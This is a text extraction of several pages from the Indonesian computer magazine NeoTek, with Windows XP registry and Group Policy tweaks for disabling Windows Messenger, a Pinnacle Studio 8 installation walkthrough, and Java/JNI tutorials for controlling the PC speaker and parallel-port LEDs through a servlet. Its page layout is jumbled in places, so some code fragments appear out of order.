Apanbila anda menggunakan Outlook Express sebagai program email, akan bermanfaat apabila anda dapat menambahkan Outlook Express Email Message pada opsi New sewaktu klik kanan pada desktop. Caranya masuk ke: HKEY_CLASSES_ROOT\.eml dan klik kanan pada pane kanan dan tambahkan suatu key baru dengan nama ShellNew. Di bawah key ini buat lagi subkey (dengan klik kanan lagi pada pane kanan) string value dengan nama Command. Klik kanan pada subkey Command dan tetapkan nilainya sebagai: “c:\program files\outlook express\msimn.exe” /mailurl: (tanda petik diketikkan juga). Jangan lupa menambahkan spasi setelah /mailurl:, kalau tidak yang anda tetapkan ini tidak akan berfungsi. Kini coba kembali ke desktop, klik kanan, pilih New dan tampak adanya entri baru di situ.

Pesan Email Baru Langsung pada Desktop

1

KEY BARU DIBAWAH .EML
Buka Registry Editor dan masuk ke HKEY_CLASSES_ROOT\.eml. Di bawah .eml buat key baru dengan nama ShellNew. Pada ShellNew buat string value dengan nama Command. Tetapkan value-nya sebagai: “c:\program files\outlook express\msimn.exe” /mailurl:

2

KLIK KANAN PADA DESKTOP
Pada desktop klik kanan dan pilih New, akan tampak ada entri baru di sini, yaitu Outlook Express Mail Message, yang bila dipilih akan membuka jendela New Message dari Outlook Express.

Vol. IV No. 05 NeoTek

9

NeoStart

Bongkar Pasang Komponen
Pada Windows XP sudah terpasang software maupun setelan yang dianggap terbaik untuk anda, walaupun mungkin bukan itu yang anda mau. Windows Messenger yang tiap kali start selalu dimuat, misalnya, adalah salah satu ‘fasilitas’ yang menjengkelkan.
banyak waktu, besar kemungkinan bahwa anda tidak membutuhkan Windows Messenger, yang selalu dijalankan oleh Windows XP setiap kali dijalankan. Cara termudah untuk menghentikannya adalah masuk ke Windows Messenger, klik Tools > Options..., pilih tab Preferences, dan hilangkan tick didepan Run This Program When Windows Start maupun Allow This Program To Run in The Background. Pada Windows XP Pro ada cara lain, yaitu dengan cara menjalankan Group Policy. Pilih Start > Run, lalu ketikkan gpedit.msc dan jendela Group Policy akan ditampilkan. Pilih Computer Configuration\Administrative Templates\ Windows Components\Windows Messenger. Double click pada Do not allow Windows Messenger to be run yang akan memunculkan jendela dialog khusus. Pada tab Setting pilih Enabled. Dapat juga dengan mengutak-atik registry (berlaku untuk Windows XP Home maupun Pro). Jalankan regedit dan hapus key-key berikut: HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run\MSMSGS

UTAK-ATI K WI N DOWS X P

K

ECUALI ANDA MEMANG ANAK REMAJA YANG PUNYA

Windows Messenger tidak terdapat dalam daftar Windows Component yang dapat dibuang, sebab memang disembunyikan. Untuk menampilkannya anda harus melakukan perubahan pada file sysoc.inf yang terdapat pada direktori: C:\Windows\inf Sebelum melakukan perubahan terhadap file sysoc.inf ini, salin dulu menjadi misalnya sysoc2.inf, agar alih-alih ada yang salah, anda dapat kembali ke setting awal. Kini buka file sysoc.inf dengan Wordpad. Setiap baris teks mewakilkan suatu komponen Windows yang dapat ditampilkan pada jendela Add/Remove Windows Components. Salah satunya adalah Windows Messenger. Hilangkan kata hide pada baris ini, save file ini, dan restart komputer anda. Kini anda dapat menemukan Windows Messenger sebagai salah satu komponen yang dapat dibuang pada jendela Add/Remove Windows Components.

Mem-bypass Recycle Bin
Anda mungkin sudah tahu bahwa anda dapat sama sekali menghapus suatu file tanpa perlu melalui Recycle Bin, dengan cara meng-highlight file itu pada Windows Explorer dan menekan Shift+Delete. Apabila anda menggunakan Windows XP Pro anda dapat menyetel agar file langsung dihapus tanpa melalui Recycle Bin, yaitu melalui penyetelan Group Policies.

Uninstall Windows Messenger
Apabila anda ingin sama sekali meng-unistall Windows Messenger, maka akan menemui kesulitan. Pasalnya,

Menampilkan Windows Messenger dari Persembunyiannya

1

FILE SYSOC.INF
Dapatkan file sysoc.inf pada C:\Windows\inf lalu buka dan save lagi sebagai backup-nya (misalnya sysoc2.inf). Cari baris yang berisi msmsgs dan buang teks hide. Save kembali sebagai sysoc.inf dan restart komputer anda.

2

KINI BISA DI-REMOVE
Kini bila anda masuk ke Start > Control Panel, double click Add or Remove Program dan kemudian pilih Add/Remove Windows Components, maka akan terlihat bahwa Windows Messenger kini sudah menjadi salah satu komponen yang dapat di-remove.

10

NeoTek Vol. IV No. 05

NeoStart
kemudian double click pada Do not move deleted files to the Recycle Bin yang akan menampilkan jendela Do not move files to the Recycle Bin Propeties. Pada tab Setting pilih Enable. Di sini juga terdapat banyak setting lain yang dapat anda atur sesuai selera anda.

Send ke Mana Saja
Kita semua tahu akan adanya opsi Send yang tampil apabila k kita meng-klik kanan suatu file dalam Windows Explorer. Pada Windows XP terdapat suatu folder tersembunyi SendTo yang dapat anda temukan di C:\Documents and Settings\ User\SentTo, dan dengan menambahkan atau mengurangi item yang ada dalam folder ini, anda dapat mengkonfigurasi menu SendTo sesuai keinginan. Anda dapat menambahkan shortcut ke program (misalnya untuk membuka Notepad), atau shortcut ke lokasi tertentu (apabila anda perlu memindahkan banyak file ke suatu folder). Yang anda tambahkan atau buang hanya berlaku untuk User yang bersangkutan saja.
WIndows XP Pro mempunyai Group Policy yang dapat disetel dengan cara menjalankan file gpedit.msc

Meningkatkan Kinerja Windows XP
Pilih My Computer, lalu klik kanan dan pilih Properties. Pada tab Advanced pilih Performance Setting yang akan menampilkan jendela Performance Options. Disini pilih opsi Adjust for Best Performance, yang akan menghilangkan hiasan-hiasan grafis yang bagus, tetapi sebenarnya tidak terlalu perlu. Pada jendela Performance Options yang sama, pilih tab Advanced dan pada bagian Memory usage, klik System cache. Opsi ini terutama akan sangat membantu apabila anda sering menggunakan program grafis seperti halnya video editing. Pilih Start > Run... kemudian ketikkan perintah rundll32.exe advapi32.dll,ProcessIdleTask yang artinya memerintahkan Windows untuk memproses terutama task yang sedang dikerjakan, sedangkan proses background dijalankan lebih lambat.

Dari Start > Run... ketikkan gpedit.msc untuk menampilkan jendela Group Policies. Masuk ke: User Configuration\Administrative Templates\Windows Components\Windows Explorer

Menambah Fungsi Windows Explorer

1

FOLDER MILIK USER
Buka Documents and Setting, lalu masuk ke user tertentu dan akan terlihat adanya folder dengan nama SendTo. Buka folder ini dan klik kanan dan pilih New lalu pilih lagi Shortcut.

2

SHORTCUT KE WINZIP
Misalkan kita pilih shortcut ke WinZip, maka dalam folder SendTo itu akan tampak adanya entri baru WINZIP32.

3

MEN-ZIP FILE JADI MUDAH
Kini pada Windows Explorer, apabila anda klik kanan pada suatu file dan pilih Send To, maka salah satu pilihannya adalah memasukkannya ke dalam suatu zip file.

Vol. IV No. 05 NeoTek

11

NeoStart

Stop Windows Messenger!
Windows Messenger yang merupakan kloning dari MSN Messenger 4.6 adalah fasilitas dari Windows XP yang dapat berjalan secara otomatis ketika membuka Outlook Express atau beberapa site dari Microsoft. Hal ini sangat memudahkan para penggunanya, terutama yang mempunyai koneksi ke internet. Tapi bagaimana bagi pengguna yang offline? Ikuti tutorial praktis Bondan Muliawan (milis@waroengbedjo.com) untuk menghentikan fasilitas otomatis ini.
INDOWS XP SERVICE PACK 1 TELAH MEMBERIKAN FAsilitas untuk meng-uninstall Windows Messenger. Sedangkan Windows XP Home Edition dan XP Profesional (tanpa SP1) belum memberikan fasilitas untuk menghapus Windows Messenger. Cara termudah untuk menghentikan aksi dari Windows Messenger adalah meng-upgrade XP anda ke Windows XP SP1 dan uninstall program Windows Messenger. Tapi jika Anda lebih suka untuk bermain dengan registry dan gemar untuk meng-oprek komputer anda, ikuti beberapa tip berikut yang dapat digunakan untuk memodifikasi tingkah laku Windows Messenger. TIP 1: Windows Messenger otomatis berjalan sendiri ketika membuka Hotmail atau web site tertentu. Hal ini dapat dicegah dengan melakukan hacking pada registry. Buka registry anda Start > Run, ketik regedit dan klik OK HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE011d2-A441-00C04F795683}\LocalServer32 Sebelum melangkah ke proses selanjutnya backup dulu registry anda jika nantinya ingin mengembalikan lagi. Hapus baris yang menunjukkan path ke file MSMSGS.EXE pada nilai (Default). Klik dua kali pada nilai (Default) dan hapuslah seluruh baris. Tutup Regedit, sekarang Windows Messenger akan berhenti beraksi ketika Hotmail dibuka.

UTAK-ATI K WI N DOWS X P

W

Simpan dan jalankan dengan cara klik dua kali file tersebut pada Windows Explorer. Windows Messenger tidak akan muncul, tapi akibatnya waktu yang dibutuhkan untuk membuka Outlook Express akan bertambah (sekitar 30 detik). Untuk itu ubah file tanpamsg.reg menjadi:
Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D940000F875C541}\InProcServer32] @="" "ThreadingModel"="" [HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D940000F875C541}\LocalServer32] @=""

Klik dua kali untuk mematikan fasilitas otomatis Windows Messenger. Selain itu buatlah file denganmsg.reg untuk menghidupkan kembali fasilitas tersebut, isinya:
Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D940000F875C541}\InProcServer32] @="C:\\Program Files\\Messenger\\msgsc.dll" "ThreadingModel"="Apartment" [HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D940000F875C541}\LocalServer32] @="\"C:\\Program Files\\Messenger\\msmsgs.exe\""

TIP 2: Windows Messenger dapat di uninstall. Untuk menghapusnya tekan Start > Run, ketik:
RUNDLL32 ADVPACK.DLL,LaunchINFSection %windir%\INF\MSMSGS.INF,BLC.Remove

Klik OK atau tekan Enter. Windows Messenger akan terhapus dari Windows anda.

Cara lain jika anda malas membuka regedit, buatlah file dengan nama tanpamsg.reg dengan Notepad. Ketik:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3A614DCABE0-11d2-A441-00C04F795683}\LocalServer32] @=""

12

NeoTek Vol. IV No. 05

NeoStart
TIP 3: Untuk mencegah agar Windows Messenger tidak berjalan otomatis ketika anda membuka account Hotmail. Jalankan Regedit dan cari:
HKEY_CLASSES_ROOT\Messenger.MsgrObject

Klik kanan pada Messenger.MsgrObject, pilih rename, dan ubah namanya dengan yang lain, contoh: Messenger.MsgrObject-DIMATIKAN! Klik OK atau tekan Enter, kemudian keluar dari Registry Editor. Selain mengubah anda bisa menghapus nilai tersebut, tapi sebelumnya sebaiknya anda backup dulu. TIP 4: Untuk mencegah agar Windows Messenger tidak berjalan otomatis di Windows XP Anda.

dan ubah nilai dari automatic menjadi manual atau disable. Lalu: Per User Restriction\User Configuration\Adminstrative Templates\Windows Components\Windows Messenger dan ubah nilai dari automatic menjadi manual atau disable. Keluar dari GPE dan restart Windows. Setelah melakukan ini Outlook atau Outlook Express ketika dibuka akan menjadi lama, sehingga untuk mempercepat jalankan: MS Outlook Express > Tools > Options, pilih General tab dan matikan Messenger Support. MS Outlook > Tools > Options, pilih tab Other dan matikan Messenger Support.
Catatan untuk Group Policy Editor (GPE): Jika Anda membuka GPE pada Windows XP SP1, maka anda akan menemukan fasilitas untuk mematikan Windows Messenger. Lihat gambar di bawah. Ubah nilai keduanya pada Enable maka mustahil Windows Messenger dapat berjalan di komputer anda lagi.

Jalankan Regedit, dan masuklah pada: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\ Messenger\Client Buat baru (atau modifikasi jika sudah ada), nilai dari PreventAutoRun dan PreventRun dengan cara klik kanan pada area yang kosong. Pilih New > Key > DWORD, beri nilai 1 pada keduanya. Hal ini baru berfungsi jika Anda sudah me-restart komputer. TIP 5: Cara lain untuk mencegah agar Windows Messenger tidak berjalan otomatis ketika Windows XP booting.

Klik pada Start > Run... ketik msconfig klik OK atau tekan Enter. Klik pada tab Startup, hilangkan tanda cek pada MSMSGS (Windows Messenger). Tutup msconfig dan restart Windows. Ingat bahwa dengan cara ini Windows Messenger tetap berjalan ketika Anda menjalankan Outlook, Outlook Express, atau membuka Hotmail. Selain itu dapat gunakan cara lain: Klik tombol Start> Run... lalu ketik gpedit.msc dan pilih: Per Machine Restriction\Computer Configuration\ Administrative Templates\Windows Components\ Windows Messenger

TIP 6: Mencegah Windows Messenger otomatis login menggunakan account dari Microsoft Passport. Klik tombol Start > Run... dan ketikkan control userpasswords2 tekan Enter atau klik OK dan pilih tab Advanced. Pilih Manage Passwords dan hapus semua masukkan Passport dan klik OK/Apply. Jalankan Windows Messenger, sign in dan ketik passport anda, alamat email, dan password, kemudian hilangkan check pada Sign me in automatically, simpan dan keluar dari Windows Messenger. TIP 7: Mencegah secara permanen Windows Messenger agar tidak berjalan ketika membuka Outlook atau Hotmail. Caranya mudah, masuk ke Windows Explorer ubah nama pada folder C:\Program Files\Messenger menjadi Messenger-OFF! Cara ini akan menon-aktifkan Windows Messenger tapi tidak berpengaruh apapun ketika Outlook dijalankan. Demikianlah beberapa tip untuk mengendalikan perilaku Windows Messenger. Semoga beberapa cara di atas dapat menghilangkan rasa jengkel anda terhadap tindak-tanduk Windows Messenger. Vol. IV No. 05 NeoTek
13

NeoStyle

Instalasi Pinnacle Studio 8
Andi Ismayadi (Fuzk3_kendi@yahoo.com) menanggapi banyaknya pertanyaan mengenai instalasi Pinnacle Studio 8 dan Hollywood FX.
dan Hollywood FX yang dikirimkan ke e-mail saya dan banyaknya pertanyaan tentang cara menginstal Pinnacle studio 8 dan Hollywood FX. Saya akan kembali membahas cara menginstal program video editing ini. Pertanyaan yang sering muncul adalah Setelah saya install Pinnacle Studio 8 ini program Hollywood fx-nya kok nggak ada?

BA S I C V I D E O E D I T I N G

K

ARENA BANYAKNYA MINAT TERHADAP PINNACLE STUDIO 8

Hal ini yang kiranya menjadi masalah dalam penginstalan program bundle dari Pinnacle Studio 8. Kita akan ulas cara menginstal Pinacle Studio 8 dan bundlenya. Cara menginstall berikut adalah menginstall Pinnacle Studio 8 secara Auto Installation Bundle, artinya anda menginstal Pinnacle Studio 8 lalu Pinnacle secara otomatis akan menginstal program-program bundlenya.

Hollywood FX dalam Pinnacle Studio 8: Auto Installation Bundle

1

LETAK FOLDER HOLLYWOOD FX
Direktori Hollywood FX harus berada dalam direktori instalasi Pinnacle Studio 8. Pengalaman saya apabila folder Hollywood FX di luar direktori Pinnacle Studio 8, Hollywood FX tidak dapat diinstal. Namun ada juga program Hollywood FX yang Stand Alone dan diinstal diluar Pinnacle.

2

PILIHAN BAHASA
Double click icon Setup.exe lalu akan muncul konfirmasi bahasa yang akan digunakan dalam proses penginstalan.

3

INSTALASI DIMULAI
Setelah itu akan muncul proses instalasi program.

4

SERIAL NUMBER
Disini anda diminta untuk memasukan Serial Number Pinnacle Studio 8, setelah itu klik Next untuk melanjutkan.

5

LICENSE AGREEMENT
Lalu akan muncul jendela License Agreement, disini dijelaskan perjanjian-perjanjian antar vendor dengan pengguna, klik Yes untuk melanjutkan. Setelah itu akan ada tampilan yang anda dapat memilih tipe instalasi diantaranya: Typical (sangat disarankan anda untuk memilih tipe ini).

6

OPSI-OPSI INSTALASI
Compact (apabila ingin menginstal dengan kebutuhan minimum). Custom (dapat memilih bagian program yang akan diinstal). Lalu ada direktori tempat program ini bersemayam, Default-nya ada di direktori C:\ Namun anda dapat menggantinya ke direktori yang ada tentukan sendiri. Klik Next untuk melanjutkan.

14

NeoTek Vol. IV No. 05

NeoStyle

7

RINCIAN INSTALASI
Lalu akan muncul tampilan informasi tentang instalasi dan bagian-bagian dari program yang akan diinstal, Klik Next lagi untuk melanjutkan ke proses instalasi.

8

PROSES INSTALASI
Setelah itu proses penginstalan berlangsung.

9

AUTOMATIC BUNDLE
Seperti yang dijelaskan diatas bahwa ini adalah instalasi secara automatic bundle instalation, oleh karena itu Hollywood FX secara otomatis akan mengeksekusi dirinya untuk terintstal dalam komputer anda.

10

INSTALASI HOLLYWOOD FX
Disini anda dapat lihat proses instalasi dari Hollywood FX.

11

INSTALASI SELESAI
Nah, setelah lama menunggu, instalasi Pinnacle Studio 8 akhirnya beres juga. Disini akan ada pertanyaan apakah anda ingin menaruh icon Shortcut di dekstop?

12

RESTART KOMPUTER
Setelah itu ada pertanyaan untuk me-restart komputer sekarang atau nanti, saya sarankan anda me-restrart terlebih dahulu komputer anda untuk menyesuaikan system yang baru di install.

Instalasi Hollywood FX dari CD NeoTek
Diatas adalah instalasi Pinnacle Studio 8 dan Hollywood FX dengan cara Auto Bundle Installation. Nah, bagaimana caranya kita ingin menginstall Hollywood FX yang terdapat dalam CD NeoTek edisi Vol. IV No. 02. Dalam hal ini penginstalan Hollywood FX yang terdapat dalam CD NeoTek itu adlaah proses instalasi secara Stand Alone Installation

13

REGISTRASI
Nah, ketika anda masuk untuk pertama kali ke Pinnacle Studio 8 disini akan ada konfirmasi update register, pilih I Am Already Registered.

14

SIAPKAN KABEL
Selamat anda telah melakukan instalasi ini dan kini anda masuk untuk pertama kalinya ke Pinnacle Studio 8. Siap untuk bekarya.

Vol. IV No. 05 NeoTek

15

NeoStyle
Hollywood FX: Stand Alone Installation

1

BUKA CD NEOTEK IV/02
Masuk ke menu CD NeoTek yang terdapat program Hollywood FX 4.5 Gold. Klik menunya.

2

PERSIAPAN INSTALASI
Anda akan langsung melihat proses persiapan instalasi program ini.

3

WELCOME SCREEN
Ketika persiapan selesai instalasi akan memunculkan sambutan dan pesan dari vendor. Untuk melanjutkan instalasi klik Next.

4

INSTAL DI FOLDER APA?
Lalu akan muncul tempat instalasi ke folder yang akan dipakai untuk program ini bersemayam anda dapat menggantinya, setelah itu klik Next untuk melanjutkan ke proses selanjutnya

5

PROSES INSTALASI HOLLYWOOD FX
Proses instalasi berjalan secara otomatis; anda tinggal menunggu.

6
16

SERIAL NUMBER
Setelah proses selesai anda diminta memasukkan serial numbernya. Kalau anda tidak memiliki anda klik Cancel saja.

7

INSTALASI SELESAI
Konfirmasi bahwa selesainya semua proses instalasi program ini. Nah, setelah ini anda dapat bekerja dengan tenang karena semua program telah terinstal dengan semestinya.

NeoTek Vol. IV No. 05

NeoTutor

Java dan Port I/O
Pada dasarnya Java tidak mempunyai kemampuan untuk membaca/menulis dari/atau ke port I/O. Untuk itu, Fitrianto Halim (fitriantoh@hotmail.com) membahas cara menggunakan C++ untuk memberikan fungsi itu pada Java.
PC SEMAKIN CEPAT, TETAPI ada beberapa peninggalan dari generasi sebelumnya (PC XT dan PC AT) yang masih dipertahankan. Beberapa di antaranya adalah port-port paralel, serial, timer, PC speaker, dan lain-lain. Pada artikel ini, penulis membahas cara membaca dari dan/ atau menulis ke port I/O (Input/Output) menggunakan Java yang dikombinasikan dengan C++ untuk bagian native-nya. Sebagai contoh pemanfaatannya, akan disajikan cara membangkitkan suara pada PC speaker.

JAVA WO R KS H O P

W

ALAUPUN PERKEMBANGAN

/* * Class: myIO * Method: outputb * Signature: (II)V */ JNIEXPORT void JNICALL Java_myIO_outputb (JNIEnv *, jobject, jint, jint); #ifdef __cplusplus } #endif #endif Sekarang, kita menginjak ke program yang ditulis dengan C++. Untuk lebih jelasnya, Anda dapat melihat listing file _io_.cpp berikut: #include <conio.h> #include "myIO.h" JNIEXPORT jint JNICALL Java_myIO_inputb (JNIEnv *env, jobject obj, jint nport) { return _inp(nport); } JNIEXPORT void JNICALL Java_myIO_outputb (JNIEnv *env, jobject obj, jint nport, jint out) { _outp(nport, out); } Lalu, compile _io_.cpp dengan perintah berikut untuk menghasilkan _io_.dll: cl _io_.cpp /LD /Fe_io_.dll /Ic:\jdk1.3\include /Ic:\jdk1.3\include\win32 /Ic:\progra~1\micros~3\vc98\include Catatan: • Ganti c:\progra~1\micros~3\vc98\include sesuai dengan penempatan folder include dari Visual C++ yang anda gunakan. Sebetulnya, kita bisa memasukkan long file name, tetapi berhubung keterbatasan jumlah karakter pada command-line, maka hal itu tidak kami lakukan. • Jika compiler tidak dapat menemukan file-file library, maka copy-kan file-file: Libcmt.lib, Oldnames.lib, dan Kernel32.lib ke current directory (directory tempat Anda melakukan compile). Ingat, nantinya hanya file-file myIO.class dan _io_.dll yang dipergunakan dalam aplikasi.

Kelas MyIO dan _io_.dll
Java pada dasarnya tidak mempunyai kemampuan untuk membaca dari dan/atau menulis ke port I/O. Untuk itu, kita harus membuat native-nya yang dibuat dengan C++. Untuk lebih jelasnya, mari kita membuat kelas myIO (lihat listing file myIO.java) sebagai berikut: class myIO { public native int inputb(int nport); public native void outputb(int nport, int out); static{ System.loadLibrary("_io_"); } } Compile myIO.java menggunakan perintah: javac myIO.java Karena kita akan membuat native-nya dengan C++ (dalam hal ini digunakan MS Visual C++ 6.0), maka ketikkan perintah berikut untuk menghasilkan file header (file myIO.h): javah -jni myIO Isi file myIO.h yang dihasilkan adalah sebagai berikut: /* DO NOT EDIT THIS FILE - it is machine generated */ #include <jni.h> /* Header for class myIO */ #ifndef _Included_myIO #define _Included_myIO #ifdef __cplusplus extern "C" { #endif /* * Class: myIO * Method: inputb * Signature: (I)I */ JNIEXPORT jint JNICALL Java_myIO_inputb (JNIEnv *, jobject, jint);

Pembangkitan Suara pada PC Speaker
Untuk membangkitkan suara pada PC speaker sebenarnya cukup mudah, yaitu dengan cara menghidupkan dan mematikan PC speaker secara bergantian dengan durasi yang sama. Umumnya, teknik yang digunakan adalah seperti yang diperlihatkan pada Gambar 1. Vol. IV No. 05 NeoTek
17

NeoTutor

Gambar 1

Langkah-langkahnya adalah: • Isi port 43h dengan: 10110110b atau sama dengan B6h. • Isi port 42h dengan frekuensi pembagi, LSB dulu baru MSB. • Aktifkan bit-0 dan bit-1 dari port 61h. Untuk menghentikannya cukup mudah, yaitu dengan menonaktifkan bit-0 dan bit-1 dari port 61h. Misalkan, kita ingin membangkitkan suara dengan frekuensi 1000Hz, maka cara menghitung frekuensi pembagi adalah:
Frekuensi Pembagi = 1193180 ______________ = 1193 1000 = 0429h

(JAVA DAN PORT I/O), KITA telah belajar cara membaca dari dan/atau menulis ke port I/O (Input/Output) menggunakan Java disertai contoh pemanfaatannya, yaitu membangkitkan suara pada PC speaker. Pada artikel kali ini, kita akan membahas pemanfaatan kelas myIO dan _io_.dll untuk tujuan yang lebih menarik lagi, yaitu pengendalian jarak jauh berbasis internet. Perangkat yang akan kita kendalikan juga sederhana, karena kita memanfaatkan port yang tersedia, yaitu Parallel Port.

P

ADA ARTIKEL SEBELUMNYA

Parallel Port
Parallel Port (atau disebut juga Printer Port) umumnya dimanfaatkan untuk melayani pencetak paralel. Port paralel pada PC sekarang umumnya 1 buah (LPT1). Tabel 1 berisi alamat, sifat, dan nama port untuk LPT1: Tabel 1. Alamat
378h 37Ah 379h

Berikut ini adalah program untuk menghidupkan suara dengan frekuensi 1000Hz selama 5 detik (lihat file testIO.java): class testIO { public static void main(String[] args) { try { int in; myIO io = new myIO(); io.outputb(0x43, 0xb6); io.outputb(0x42, 0xa9); io.outputb(0x42, 0x04); in = io.inputb(0x61); in = in | 0x03; io.outputb(0x61, in); Thread.sleep(5000); in = io.inputb(0x61); in = in & 0xfc; io.outputb(0x61, in); } catch(InterruptedException e) { } } } Untuk meng-compile-nya, gunakan perintah: javac testIO.java Untuk menjalankannya, gunakan perintah: java testIO

Sifat
R/W R/W R

Nama
Data port (DP) Printer control (PC) Printer status (PS)

Tabel 2 berisi no pin, nama dan sinyal pada soket D25-betina: Tabel 2. Pin #
2 3 4 5 6 7 8 9 1 14 16 17 15 13 12 10 11 18 ... 25

Nama
DP-0 DP-1 DP-2 DP-3 DP-4 DP-5 DP-6 DP-7 PC-0 PC-1 PC-2 PC-3 PS-3 PS-4 PS-5 PS-6 PS-7

Sinyal
data data data data data data data data bit-0 bit-1 bit-2 bit-3 bit-4 bit-5 bit-6 bit-7

Penutup
Anda dapat mengembangkan program di atas agar lebih berguna, misalkan untuk membaca file yang berisi pasangan notasi dan durasinya. Selamat mencoba dengan Tip: Masukkan folder bin dari JDK dan Visual C++ ke dalam PATH untuk memudahkan kompilasi.
18

strobe autofeed init select error select paper end acknowledge busy ground

NeoTek Vol. IV No. 05

NeoTutor

Remote Control dengan Servlet
Melanjutkan bahasan Java dan port I/O, Fitrianto Halim (fitriantoh@hotmail.com) menunjukkan pembuatan suatu aplikasi untuk memanfaatkannya, yaitu remote control berbasis Internet dengan memanfaatkan parallel port.
Aplikasi
Aplikasi yang kami buat sederhana saja, yaitu hanya untuk yang berjalan di sisi server menggunakan servlet dan beberapa file HTML sebagai antar-muka untuk client. Sedangkan untuk client-nya, Anda dapat memanfaatkan browser. Diharapkan anda sudah mengenal Tomcat yang berfungsi sebagai servlet container. Jika belum, Anda dapat membacanya di NeoTek Vol. III No. 3. Dibawah folder webapps, buatlah folder remote beserta sub-sub folder-nya sebagai terlihat pada Gambar 1: Ada dua buah file HTML yang digunakan sebagai antar-muka untuk client, yaitu index.html dan pilih.html; yang keduanya diletakkan pada folder remote. Gambar 1 Isi file index.html adalah sebagai berikut:
<html> <head><title>Menu Utama</title></head> <body> <p align=center> <strong>Menu Utama</strong> <br><hr> </p> <p align=left> &#149; <a href="./myRemote?Status=baca">Baca Status LED</a><br/> &#149; <a href="pilih.html">Ganti Status LED</a><br/> </p> </body> </html> <option value=->Abaikan</option> <option value=1>Nyala</option> <option value=0>Padam</option> </select> </td> </tr> <tr> <td>LED #3: </td> <td> <select name=LED3> <option value=->Abaikan</option> <option value=1>Nyala</option> <option value=0>Padam</option> </select> </td> </tr> <tr> <td>LED #4: </td> <td> <select name=LED4> <option value=->Abaikan</option> <option value=1>Nyala</option> <option value=0>Padam</option> </select> </td> </tr> <tr> <td>LED #5: </td> <td> <select name=LED5> <option value=->Abaikan</option> <option value=1>Nyala</option> <option value=0>Padam</option> </select> </td> </tr> <tr> <td>LED #6: </td> <td> <select name=LED6> <option value=->Abaikan</option> <option value=1>Nyala</option> <option value=0>Padam</option> </select> </td> </tr> <tr> <td>LED #7: </td> <td> <select name=LED7> <option value=->Abaikan</option> <option value=1>Nyala</option> <option value=0>Padam</option> </select> </td> </tr> <tr> <td>LED #8: </td> <td> <select name=LED8>

JAVA WO R KS H O P

Isi file pilih.html adalah sebagai berikut:
<html> <head><title>Ganti Status LED</title></head> <body> <p align=center> <strong>Ganti Status LED</strong> <br><hr> </p> <p align=left> <form method=post action=./myRemote> <input type=hidden name=Status value=tulis> <table> <tr> <td>LED #1: </td> <td> <select name=LED1> <option value=->Abaikan</option> <option value=1>Nyala</option> <option value=0>Padam</option> </select> </td> </tr> <tr> <td>LED #2: </td> <td> <select name=LED2>

Vol. IV No. 05 NeoTek

19

NeoTutor
<option value=->Abaikan</option> <option value=1>Nyala</option> <option value=0>Padam</option> </select> </td> </tr> <tr> <td colspan=2 align=center> <input type=submit value=Ganti> &nbsp; &nbsp; &nbsp; <input type=reset value=Reset> </td> </tr> </table> </form> </p> <hr><br> &#149; <a href=index.html>Index</a> </body> </html> if(LED1==null) LED1 = "-"; if(LED2==null) LED2 = "-"; if(LED3==null) LED3 = "-"; if(LED4==null) LED4 = "-"; if(LED5==null) LED5 = "-"; if(LED6==null) LED6 = "-"; if(LED7==null) LED7 = "-"; if(LED8==null) LED8 = "-"; String s = LED1+" "+LED2+" "+LED3+" "+LED4+" "+ LED5+" "+LED6+" "+LED7+" "+LED8; String myMsg = myTask("w", s); myWriter(out, myMsg); } else myWriter(out, "Maaf, request-nya salah..."); } String myTask(String Status, String s) { int[] aSquare = {1, 2, 4, 8, 16, 32, 64, 128}; String sMsg = ""; myIO io = new myIO(); int in , i; if(Status.equals("w")){ sMsg += ("Tulis: "+s+"<br><br>"); int nAND = 255; int nOR = 0; StringTokenizer st = new StringTokenizer(s, " "); int out; String sST; i = 0; while(st.hasMoreTokens()) { sST = st.nextToken(); if(sST.equals("0")) nAND -= aSquare[i]; else if(sST.equals("1")) nOR += aSquare[i]; i++; } out = io.inputb(0x378); out = (out | nOR) & nAND; io.outputb(0x378, out); } in = io.inputb(0x378); for(i=0; i<8; i++) { sMsg += ("LED #"+(i+1)+": "); if((in & aSquare[i]) > 0) sMsg += " Nyala"; else sMsg += " Padam"; sMsg += "<br>"; } return sMsg; } void myWriter(PrintWriter out, String myMsg) { String sMsg = ""; sMsg += "<html>\r\n"; sMsg += "<head><title>Status LED</title></head>\r\n"; sMsg += "<body>\r\n"; sMsg += "<p align=center>\r\n"; sMsg += "<strong>Status LED</strong>\r\n"; sMsg += "<br><hr>\r\n"; sMsg += "</p>\r\n"; sMsg += "<p align=left>\r\n"; sMsg += myMsg; sMsg += "</p>\r\n"; sMsg += "<hr><br>\r\n"; sMsg += "&#149; <a href=index.html>Index</a>\r\n"; sMsg += "</body>\r\n"; sMsg += "</html>\r\n"; out.write(sMsg); out.flush(); } }

Sekarang kita menginjak ke servlet-nya. Ketikkan file myParalel.java pada folder classes dengan isi sbb:
import javax.servlet.*; import javax.servlet.http.*; import java.io.*; import java.net.*; import java.util.*; public class myParalel extends HttpServlet { public void init() throws ServletException { // inisialisasi -> padamkan semua LED myIO io = new myIO(); io.outputb(0x378, 0); } public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { PrintWriter out = response.getWriter(); response.setContentType("text/html"); String Status = request.getParameter("Status"); if(Status==null) myWriter(out, "Maaf, request-nya salah..."); else if(Status.toLowerCase().equals("baca")){ String myMsg = myTask("r", null); myWriter(out, myMsg); } else myWriter(out, "Maaf, request-nya salah..."); } public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { PrintWriter out = response.getWriter(); response.setContentType("text/html"); String Status = request.getParameter("Status"); String LED1 = request.getParameter("LED1"); String LED2 = request.getParameter("LED2"); String LED3 = request.getParameter("LED3"); String LED4 = request.getParameter("LED4"); String LED5 = request.getParameter("LED5"); String LED6 = request.getParameter("LED6"); String LED7 = request.getParameter("LED7"); String LED8 = request.getParameter("LED8"); if(Status==null) myWriter(out, "Maaf, request-nya salah..."); else if(Status.toLowerCase().equals("tulis")){ // null -> diabaikan 20

